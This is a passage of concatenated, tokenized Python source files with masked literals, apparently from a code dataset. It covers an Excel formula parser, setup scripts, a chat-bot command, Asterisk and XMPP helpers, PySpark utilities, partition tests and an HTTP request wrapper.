<NUM_LIT:2> ) - <NUM_LIT:1> ) + self . rpn [ pos1 + <NUM_LIT:2> : ] <EOL> elif la1 and la1 in [ FUNC_CHOOSE ] : <EOL> pass <EOL> self . match ( FUNC_CHOOSE ) <EOL> arg_type = "<STR_LIT:R>" <EOL> rpn_chunks = [ ] <EOL> self . match ( LP ) <EOL> self . expr ( "<STR_LIT>" ) <EOL> rpn_start = len ( self . rpn ) <EOL> ref_markers = [ len ( self . sheet_references ) ] <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == COMMA or self . LA ( <NUM_LIT:1> ) == SEMICOLON ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> mark = len ( self . rpn ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> elif la1 and la1 in [ RP , COMMA , SEMICOLON ] : <EOL> pass <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgMissArg ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> rpn_chunks . append ( self . rpn [ mark : ] ) <EOL> ref_markers . append ( len ( self . sheet_references ) ) <EOL> else : <EOL> break <EOL> self . match ( RP ) <EOL> self . rpn = self . rpn [ : rpn_start ] <EOL> nc = len ( rpn_chunks ) <EOL> chunklens = [ len ( chunk ) for chunk in rpn_chunks ] <EOL> skiplens = [ <NUM_LIT:0> ] * nc <EOL> skiplens [ - <NUM_LIT:1> ] = <NUM_LIT:3> <EOL> for ic in xrange ( nc - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> skiplens [ ic - <NUM_LIT:1> ] = skiplens [ ic ] + chunklens [ ic ] + <NUM_LIT:4> <EOL> jump_pos = [ <NUM_LIT:2> * nc + <NUM_LIT:2> ] <EOL> for ic in xrange ( nc ) : <EOL> jump_pos . append ( jump_pos [ - <NUM_LIT:1> ] + chunklens [ ic ] + <NUM_LIT:4> ) <EOL> chunk_shift = <NUM_LIT:2> * nc + <NUM_LIT:6> <EOL> for ic in xrange ( nc ) : <EOL> for refx in xrange ( ref_markers [ ic ] , ref_markers [ ic + <NUM_LIT:1> ] ) : <EOL> ref = self . sheet_references [ refx ] <EOL> self . sheet_references [ refx ] = ( ref [ <NUM_LIT:0> ] , ref [ <NUM_LIT:1> ] , ref [ <NUM_LIT:2> ] + chunk_shift ) <EOL> chunk_shift += <NUM_LIT:4> <EOL> choose_rpn = [ ] <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , nc ) ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" % ( nc + <NUM_LIT:1> ) , * jump_pos ) ) <EOL> for ic in xrange ( nc ) : <EOL> choose_rpn . append ( rpn_chunks [ ic ] ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , skiplens [ ic ] ) ) <EOL> choose_rpn . append ( struct . pack ( "<STR_LIT>" , ptgFuncVarV , nc + <NUM_LIT:1> , <NUM_LIT:100> ) ) <EOL> self . rpn += "<STR_LIT>" . join ( choose_rpn ) <EOL> elif la1 and la1 in [ LP ] : <EOL> pass <EOL> self . match ( LP ) <EOL> self . expr ( arg_type ) <EOL> self . match ( RP ) <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgParen ) <EOL> else : <EOL> if ( self . LA ( <NUM_LIT:1> ) == INT_CONST ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> int_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( INT_CONST ) <EOL> int_value = int ( int_tok . text ) <EOL> if int_value <= <NUM_LIT> : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgInt , int_value ) <EOL> else : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgNum , float ( int_value ) ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == REF2D ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> ref2d_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> r , c = Utils . cell_to_packed_rowcol ( ref2d_tok . text ) <EOL> ptg = ptgRefR + _RVAdeltaRef [ arg_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg , r , c ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == REF2D ) and ( self . LA ( <NUM_LIT:2> ) == COLON ) : <EOL> pass <EOL> ref2d1_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> self . match ( COLON ) <EOL> ref2d2_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> r1 , c1 = Utils . cell_to_packed_rowcol ( ref2d1_tok . text ) <EOL> r2 , c2 = Utils . cell_to_packed_rowcol ( ref2d2_tok . text ) <EOL> ptg = ptgAreaR + _RVAdeltaArea [ arg_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg , r1 , r2 , c1 , c2 ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == INT_CONST or self . LA ( <NUM_LIT:1> ) == NAME or self . LA ( <NUM_LIT:1> ) == QUOTENAME ) and ( self . LA ( <NUM_LIT:2> ) == COLON or self . LA ( <NUM_LIT:2> ) == BANG ) : <EOL> pass <EOL> sheet1 = self . sheet ( ) <EOL> sheet2 = sheet1 <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ COLON ] : <EOL> pass <EOL> self . match ( COLON ) <EOL> sheet2 = self . sheet ( ) <EOL> elif la1 and la1 in [ BANG ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . match ( BANG ) <EOL> ref3d_ref2d = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> ptg = ptgRef3dR + _RVAdeltaRef [ arg_type ] <EOL> rpn_ref2d = "<STR_LIT>" <EOL> r1 , c1 = Utils . cell_to_packed_rowcol ( ref3d_ref2d . text ) <EOL> rpn_ref2d = struct . pack ( "<STR_LIT>" , <NUM_LIT> , r1 , c1 ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ COLON ] : <EOL> pass <EOL> self . match ( COLON ) <EOL> ref3d_ref2d2 = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( REF2D ) <EOL> ptg = ptgArea3dR + _RVAdeltaArea [ arg_type ] <EOL> r2 , c2 = Utils . cell_to_packed_rowcol ( ref3d_ref2d2 . text ) <EOL> rpn_ref2d = struct . pack ( "<STR_LIT>" , <NUM_LIT> , r1 , r2 , c1 , c2 ) <EOL> elif la1 and la1 in [ EOF , EQ , NE , GT , LT , GE , LE , ADD , SUB , MUL , DIV , POWER , PERCENT , RP , COMMA , SEMICOLON , CONCAT ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptg ) <EOL> self . sheet_references . append ( ( sheet1 , sheet2 , len ( self . rpn ) ) ) <EOL> self . rpn += rpn_ref2d <EOL> elif ( self . LA ( <NUM_LIT:1> ) == NAME ) and ( _tokenSet_0 . member ( self . LA ( <NUM_LIT:2> ) ) ) : <EOL> pass <EOL> name_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> raise Exception ( "<STR_LIT>" % name_tok . txt ) <EOL> elif ( self . LA ( <NUM_LIT:1> ) == NAME ) and ( self . LA ( <NUM_LIT:2> ) == LP ) : <EOL> pass <EOL> func_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> func_toku = func_tok . text . upper ( ) <EOL> if func_toku in all_funcs_by_name : <EOL> ( opcode , <EOL> min_argc , <EOL> max_argc , <EOL> func_type , <EOL> arg_type_str ) = all_funcs_by_name [ func_toku ] <EOL> arg_type_list = list ( arg_type_str ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % func_tok . text ) <EOL> xcall = opcode < <NUM_LIT:0> <EOL> if xcall : <EOL> self . xcall_references . append ( ( func_toku , len ( self . rpn ) + <NUM_LIT:1> ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , <EOL> ptgNameXR , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ) <EOL> self . match ( LP ) <EOL> arg_count = self . expr_list ( arg_type_list , min_argc , max_argc ) <EOL> self . match ( RP ) <EOL> if arg_count > max_argc or arg_count < min_argc : <EOL> raise Exception , "<STR_LIT>" % ( arg_count , func_tok . text ) <EOL> if xcall : <EOL> func_ptg = ptgFuncVarR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , func_ptg , arg_count + <NUM_LIT:1> , <NUM_LIT:255> ) <EOL> elif min_argc == max_argc : <EOL> func_ptg = ptgFuncR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , func_ptg , opcode ) <EOL> elif arg_count == <NUM_LIT:1> and func_tok . text . upper ( ) == "<STR_LIT>" : <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> else : <EOL> func_ptg = ptgFuncVarR + _RVAdelta [ func_type ] <EOL> self . rpn += struct . pack ( "<STR_LIT>" , func_ptg , arg_count , opcode ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def sheet ( self ) : <EOL> ref = None <EOL> sheet_ref_name = None <EOL> sheet_ref_int = None <EOL> sheet_ref_quote = None <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ NAME ] : <EOL> pass <EOL> sheet_ref_name = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NAME ) <EOL> ref = sheet_ref_name . text <EOL> elif la1 and la1 in [ INT_CONST ] : <EOL> pass <EOL> sheet_ref_int = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( INT_CONST ) <EOL> ref = sheet_ref_int . text <EOL> elif la1 and la1 in [ QUOTENAME ] : <EOL> pass <EOL> sheet_ref_quote = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( QUOTENAME ) <EOL> ref = sheet_ref_quote . text [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT:'>" ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> return ref <EOL> def expr_list ( self , <EOL> arg_type_list , min_argc , max_argc <EOL> ) : <EOL> arg_cnt = None <EOL> arg_cnt = <NUM_LIT:0> <EOL> arg_type = arg_type_list [ arg_cnt ] <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> arg_cnt += <NUM_LIT:1> <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == COMMA or self . LA ( <NUM_LIT:1> ) == SEMICOLON ) : <EOL> pass <EOL> if arg_cnt < len ( arg_type_list ) : <EOL> arg_type = arg_type_list [ arg_cnt ] <EOL> else : <EOL> arg_type = arg_type_list [ - <NUM_LIT:1> ] <EOL> if arg_type == "<STR_LIT:+>" : <EOL> arg_type = arg_type_list [ - <NUM_LIT:2> ] <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , SUB , LP , REF2D ] : <EOL> pass <EOL> self . expr ( arg_type ) <EOL> elif la1 and la1 in [ RP , COMMA , SEMICOLON ] : <EOL> pass <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgMissArg ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> arg_cnt += <NUM_LIT:1> <EOL> else : <EOL> break <EOL> elif la1 and la1 in [ RP ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> return arg_cnt <EOL> _tokenNames = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def mk_tokenSet_0 ( ) : <EOL> data = [ <NUM_LIT> L , <NUM_LIT:0> L ] <EOL> return data <EOL> _tokenSet_0 = antlr . BitSet ( mk_tokenSet_0 ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from setuptools import setup <EOL> about = { } <EOL> with open ( '<STR_LIT>' ) as f : <EOL> exec ( f . read ( ) , about ) <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT:test>' : <EOL> status = os . system ( '<STR_LIT>' ) <EOL> status >>= <NUM_LIT:8> <EOL> sys . exit ( status ) <EOL> setup ( name = about [ '<STR_LIT>' ] , <EOL> version = about [ '<STR_LIT>' ] , <EOL> url = about [ '<STR_LIT>' ] , <EOL> license = about [ '<STR_LIT>' ] , <EOL> author = about [ '<STR_LIT>' ] , <EOL> author_email = about [ '<STR_LIT>' ] , <EOL> description = about [ '<STR_LIT>' ] , <EOL> long_description = __doc__ , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) </s>
<s> from kaa import bot <EOL> from urllib import quote <EOL> import json <EOL> import requests <EOL> LINE_LIMIT = <NUM_LIT:1000> <EOL> @ bot . command ( '<STR_LIT:u>' ) <EOL> @ bot . command <EOL> def urbandict ( context ) : <EOL> url = '<STR_LIT>' <EOL> url = url . format ( quote ( context . args ) ) <EOL> r = requests . get ( url ) <EOL> data = json . loads ( r . content ) <EOL> if not data [ '<STR_LIT:list>' ] [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> data = data [ '<STR_LIT:list>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . splitlines ( ) <EOL> data = '<STR_LIT:U+0020>' . join ( data ) <EOL> return data [ : LINE_LIMIT ] </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> license = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> include_package_data = True , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> ) </s>
<s> import asterisk . manager <EOL> import threading <EOL> import datetime <EOL> import settings <EOL> from models import Call <EOL> def handle_shutdown ( event , manager ) : <EOL> manager . close ( ) <EOL> def handle_event ( event , manager , call ) : <EOL> if event . name == '<STR_LIT>' : <EOL> call . disposition = event . get_header ( '<STR_LIT>' ) <EOL> call . cause = event . get_header ( '<STR_LIT>' ) <EOL> call . duration = ( datetime . datetime . now ( ) - call . start ) . seconds <EOL> call . save ( ) <EOL> with manager . lock : <EOL> manager . lock . notifyAll ( ) <EOL> def make_call ( call ) : <EOL> manager = asterisk . manager . Manager ( ) <EOL> manager . lock = threading . Condition ( ) <EOL> try : <EOL> try : <EOL> call . start = datetime . datetime . now ( ) <EOL> manager . connect ( settings . AST_HOST ) <EOL> manager . login ( settings . AST_USER , settings . AST_PASS ) <EOL> manager . register_event ( '<STR_LIT>' , handle_shutdown ) <EOL> manager . register_event ( '<STR_LIT:*>' , lambda event , manager : handle_event ( event , manager , call ) ) <EOL> response = manager . originate ( call . channel , call . extension , call . context , settings . AST_PRIO , settings . AST_TIMEOUT_ORIGINATE * <NUM_LIT:1000> , call . caller_id ) <EOL> call . response = response . get_header ( '<STR_LIT>' ) <EOL> with manager . lock : <EOL> manager . lock . wait ( settings . AST_TIMEOUT_HANGUP ) <EOL> except asterisk . manager . ManagerSocketException , ( errno , reason ) : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> except asterisk . manager . ManagerAuthException , reason : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> except asterisk . manager . ManagerException , reason : <EOL> msg = "<STR_LIT>" % reason <EOL> call . disposition = msg <EOL> raise <EOL> finally : <EOL> call . save ( ) <EOL> manager . close ( ) <EOL> def call_all ( calls ) : <EOL> import logging <EOL> import time <EOL> start_time = time . time ( ) <EOL> answered = <NUM_LIT:0> <EOL> not_answered = <NUM_LIT:0> <EOL> errors = <NUM_LIT:0> <EOL> for call in calls : <EOL> try : <EOL> logging . info ( '<STR_LIT>' % ( call . related_object , call . channel , call . context ) ) <EOL> make_call ( call ) <EOL> if call . cause in ( '<STR_LIT:4>' , '<STR_LIT>' ) : <EOL> answered += <NUM_LIT:1> <EOL> else : <EOL> not_answered += <NUM_LIT:1> <EOL> except : <EOL> errors += <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" % ( answered , not_answered , errors , time . time ( ) - start_time ) ) <EOL> return answered , not_answered , errors </s>
<s> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> import logging <EOL> import config <EOL> import time <EOL> from sleekxmpp import ClientXMPP <EOL> from sleekxmpp . exceptions import IqError , IqTimeout <EOL> from . observer import Observer <EOL> class MyXMPPClient ( ClientXMPP ) : <EOL> def __init__ ( self ) : <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> logger . setLevel ( logging . ERROR ) <EOL> ClientXMPP . __init__ ( self , config . xmpp_jid , config . xmpp_password ) <EOL> self . add_event_handler ( "<STR_LIT>" , self . session_start ) <EOL> self . add_event_handler ( "<STR_LIT:message>" , self . message ) <EOL> self . connect ( ) <EOL> self . process ( block = False ) <EOL> def session_start ( self , event ) : <EOL> self . send_presence ( ) <EOL> self . get_roster ( ) <EOL> def msend_message ( self , message ) : <EOL> logging . debug ( '<STR_LIT>' % ( message , <EOL> config . xmpp_to ) ) <EOL> self . send_message ( mto = config . xmpp_to , mbody = message , mtype = '<STR_LIT>' ) <EOL> def message ( self , msg ) : <EOL> pass <EOL> class XmppMessager ( Observer ) : <EOL> def __init__ ( self ) : <EOL> self . xmppclient = MyXMPPClient ( ) <EOL> def opportunity ( self , profit , volume , buyprice , kask , sellprice , kbid , perc , <EOL> weighted_buyprice , weighted_sellprice ) : <EOL> if profit > config . profit_thresh and perc > config . perc_thresh : <EOL> message = "<STR_LIT>" % ( profit , volume , buyprice , kask , sellprice , kbid , perc ) <EOL> self . xmppclient . msend_message ( message ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import geoip2 <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> version = geoip2 . __version__ <EOL> release = geoip2 . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> from __future__ import absolute_import <EOL> from pyspark . sql import SQLContext <EOL> from pyspark . mllib . regression import LabeledPoint <EOL> from . . utils . rdd_utils import from_labeled_point , to_labeled_point , lp_to_simple_rdd <EOL> def to_data_frame ( sc , features , labels , categorical = False ) : <EOL> '''<STR_LIT>''' <EOL> lp_rdd = to_labeled_point ( sc , features , labels , categorical ) <EOL> sql_context = SQLContext ( sc ) <EOL> df = sql_context . createDataFrame ( lp_rdd ) <EOL> return df <EOL> def from_data_frame ( df , categorical = False , nb_classes = None ) : <EOL> '''<STR_LIT>''' <EOL> lp_rdd = df . rdd . map ( lambda row : LabeledPoint ( row . label , row . features ) ) <EOL> features , labels = from_labeled_point ( lp_rdd , categorical , nb_classes ) <EOL> return features , labels <EOL> def df_to_simple_rdd ( df , categorical = False , nb_classes = None , featuresCol = '<STR_LIT>' , labelCol = '<STR_LIT:label>' ) : <EOL> '''<STR_LIT>''' <EOL> sqlContext = df . sql_ctx <EOL> sqlContext . registerDataFrameAsTable ( df , "<STR_LIT>" ) <EOL> selected_df = sqlContext . sql ( "<STR_LIT>" . format ( featuresCol , labelCol ) ) <EOL> lp_rdd = selected_df . rdd . map ( lambda row : LabeledPoint ( row . label , row . features ) ) <EOL> rdd = lp_to_simple_rdd ( lp_rdd , categorical , nb_classes ) <EOL> return rdd </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> py2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> py3 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> if py2 : <EOL> pass <EOL> elif py3 : <EOL> pass <EOL> def with_metaclass ( meta , * bases ) : <EOL> """<STR_LIT>""" <EOL> class MetaClass ( meta ) : <EOL> def __new__ ( cls , name , this_bases , dct ) : <EOL> return meta ( name , bases , dct ) <EOL> return type . __new__ ( MetaClass , '<STR_LIT>' , ( ) , { } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from . import unittest , mock <EOL> from architect . databases . postgresql . partition import Partition , RangePartition <EOL> from architect . exceptions import ( <EOL> PartitionConstraintError , <EOL> PartitionRangeSubtypeError <EOL> ) <EOL> class BasePartitionTestCase ( object ) : <EOL> def setUp ( self ) : <EOL> model = mock . Mock ( __name__ = '<STR_LIT>' ) <EOL> defaults = { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> self . partition = Partition ( model , ** defaults ) <EOL> self . range_partition = RangePartition ( model , ** dict ( constraint = '<STR_LIT:foo>' , subtype = '<STR_LIT:bar>' , ** defaults ) ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class SQLitePartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> pass <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class PostgresqlPartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> def test__get_definitions_not_implemented ( self ) : <EOL> self . assertRaises ( NotImplementedError , lambda : self . partition . _get_definitions ( ) ) <EOL> def test__get_definitions_raises_partition_range_subtype_error ( self ) : <EOL> self . assertRaises ( PartitionRangeSubtypeError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_date_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT:date>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_integer_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_string_firstchars_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> def test__get_string_lastchars_definitions_raises_partition_constraint_error ( self ) : <EOL> self . range_partition . subtype = '<STR_LIT>' <EOL> self . assertRaises ( PartitionConstraintError , lambda : self . range_partition . _get_definitions ( ) ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MysqlPartitionTestCase ( BasePartitionTestCase , unittest . TestCase ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from . import sessions <EOL> def request ( method , url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> with sessions . Session ( ) as session : <EOL> return session . request ( method = method , url = url , ** kwargs ) <EOL> def get ( url , params = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return request ( '<STR_LIT>' , url , params = params , ** kwargs ) <EOL> def options ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def head ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . setdefault ( '<STR_LIT>' , False ) <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def post ( url , data = None , json = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , json = json , ** kwargs ) <EOL> def put ( url , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , ** kwargs ) <EOL> def patch ( url , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , data = data , ** kwargs ) <EOL> def delete ( url , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return request ( '<STR_LIT>' , url , ** kwargs ) </s>
